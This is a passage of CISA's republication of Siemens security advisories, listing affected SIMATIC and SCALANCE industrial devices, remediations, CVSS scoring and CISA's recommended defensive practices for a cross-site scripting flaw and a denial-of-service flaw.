(6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0) Product Status: known_affected Remediations Mitigation Restrict access to the function right "firmware update" to instructed personnel. No fix planned Currently no fix is planned None available Currently no fix is available Vendor fix Update to V2.9.9 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109773914/ Vendor fix Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. Lukas Sohrmann reported these vulnerabilities to Siemens. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-688146 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-688146 advisory Legal Notice and Terms of Use

View CSAF Summary Multiple industrial devices contain a vulnerability that could allow an attacker to cause a denial of service condition. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. The following versions of Siemens Industrial Devices are affected: IE/PB LINK HA (6GK1411-5BB00) vers:all/* (CVE-2025-40833) IE/PB link PN IO (6GK1411-5AB10) vers:all/* (CVE-2025-40833) RUGGEDCOM RM1224 LTE(4G) EU (6GK6108-4AM00-2BA2) vers:intdot/<8.3 (CVE-2025-40833) RUGGEDCOM RM1224 LTE(4G) NAM (6GK6108-4AM00-2DA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M804PB (6GK5804-0AP00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M812-1 ADSL-Router (6GK5812-1AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M812-1 ADSL-Router (6GK5812-1BA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M816-1 ADSL-Router (6GK5816-1AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M816-1 ADSL-Router (6GK5816-1BA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M826-2 SHDSL-Router (6GK5826-2AB00-2AB2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-2 (6GK5874-2AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-3 (6GK5874-3AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-3 3G-Router (CN) (6GK5874-3AA00-2FA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-3 (6GK5876-3AA02-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-3 (ROK) (6GK5876-3AA02-2EA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (6GK5876-4AA10-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (EU) (6GK5876-4AA00-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (NAM) (6GK5876-4AA00-2DA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUB852-1 (A1) (6GK5852-1EA10-1AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUB852-1 (B1) (6GK5852-1EA10-1BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM853-1 (A1) (6GK5853-2EA10-2AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM853-1 (B1) (6GK5853-2EA10-2BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM853-1 (EU) (6GK5853-2EA00-2DA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (A1) (6GK5856-2EA10-3AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (B1) (6GK5856-2EA10-3BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (CN) (6GK5856-2EA00-3FA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (EU) (6GK5856-2EA00-3DA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (RoW) (6GK5856-2EA00-3AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE S615 EEC LAN-Router (6GK5615-0AA01-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE S615 LAN-Router (6GK5615-0AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE SC622-2C (6GK5622-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC626-2C (6GK5626-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC632-2C (6GK5632-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC636-2C (6GK5636-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC642-2C (6GK5642-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC646-2C (6GK5646-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE W1748-1 M12 (6GK5748-1GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1748-1 M12 (6GK5748-1GY01-0TA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-1 M12 (6GK5788-1GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2 EEC M12 (6GK5788-2GY01-0TA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2 M12 (6GK5788-2GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2IA M12 (6GK5788-2HY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE WAB762-1 (6GK5762-1AJ00-6AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (6GK5763-1AL00-7DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (ME) (6GK5763-1AL00-7DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (US) (6GK5763-1AL00-7DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (6GK5766-1GE00-7DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (ME) (6GK5766-1GE00-7DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 EEC (6GK5766-1GE00-7TA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 EEC (ME) (6GK5766-1GE00-7TC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUB762-1 (6GK5762-1AJ00-1AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUB762-1 iFeatures (6GK5762-1AJ00-2AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (6GK5763-1AL00-3AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (6GK5763-1AL00-3DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (US) (6GK5763-1AL00-3AB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM763-1 (US) (6GK5763-1AL00-3DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (6GK5766-1GE00-3DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (ME) (6GK5766-1GE00-3DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WUM766-1 (USA) (6GK5766-1GE00-3DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE X204-2 (6GK5204-2BB10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2FM (6GK5204-2BB11-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2LD (6GK5204-2BC10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X204-2LD TS (6GK5204-2BC10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X204-2TS (6GK5204-2BB10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X206-1 (6GK5206-1BB10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X206-1LD (6GK5206-1BC10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X208 (6GK5208-0BA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X208PRO (6GK5208-0HA10-2AA6) vers:all/* (CVE-2025-40833) SCALANCE X212-2 (6GK5212-2BB00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X212-2LD (6GK5212-2BC00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X216 (6GK5216-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X224 (6GK5224-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (230V, coated) (6GK5302-7GD00-3GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (230V) (6GK5302-7GD00-3EA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (24V, coated) (6GK5302-7GD00-1GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (24V) (6GK5302-7GD00-1EA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 230V, coated) (6GK5302-7GD00-4GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 230V) (6GK5302-7GD00-4EA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 24V, coated) (6GK5302-7GD00-2GA3) vers:all/* (CVE-2025-40833) SCALANCE X302-7 EEC (2x 24V) (6GK5302-7GD00-2EA3) vers:all/* (CVE-2025-40833) SCALANCE X304-2FE (6GK5304-2BD00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X306-1LD FE (6GK5306-1BF00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (230V, coated) (6GK5307-2FD00-3GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (230V) (6GK5307-2FD00-3EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (24V, coated) (6GK5307-2FD00-1GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (24V) (6GK5307-2FD00-1EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 230V, coated) (6GK5307-2FD00-4GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 230V) (6GK5307-2FD00-4EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 24V, coated) (6GK5307-2FD00-2GA3) vers:all/* (CVE-2025-40833) SCALANCE X307-2 EEC (2x 24V) (6GK5307-2FD00-2EA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3 (6GK5307-3BL00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3 (6GK5307-3BL10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3LD (6GK5307-3BM00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X307-3LD (6GK5307-3BM10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2 (6GK5308-2FL00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2 RD (inkl. SIPLUS variants) vers:all/* (CVE-2025-40833) SCALANCE X308-2LD (6GK5308-2FM00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LD (6GK5308-2FM10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH (6GK5308-2FN00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH (6GK5308-2FN10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH+ (6GK5308-2FP00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2LH+ (6GK5308-2FP10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X308-2M (6GK5308-2GG00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M (6GK5308-2GG10-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M PoE (6GK5308-2QG00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M PoE (6GK5308-2QG10-2AA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M TS (6GK5308-2GG00-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X308-2M TS (6GK5308-2GG10-2CA2) vers:all/* (CVE-2025-40833) SCALANCE X310 (6GK5310-0FA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310 (6GK5310-0FA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310FE (6GK5310-0BA00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X310FE (6GK5310-0BA10-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X320-1 FE (6GK5320-1BD00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X320-1-2LD FE (6GK5320-3BF00-2AA3) vers:all/* (CVE-2025-40833) SCALANCE X408-2 (6GK5408-2FD00-2AA2) vers:all/* (CVE-2025-40833) SCALANCE XF204 (6GK5204-0BA00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF204-2 (6GK5204-2BC00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF206-1 (6GK5206-1BC00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XF208 (6GK5208-0BA00-2AF2) vers:all/* (CVE-2025-40833) SCALANCE XM408-4C 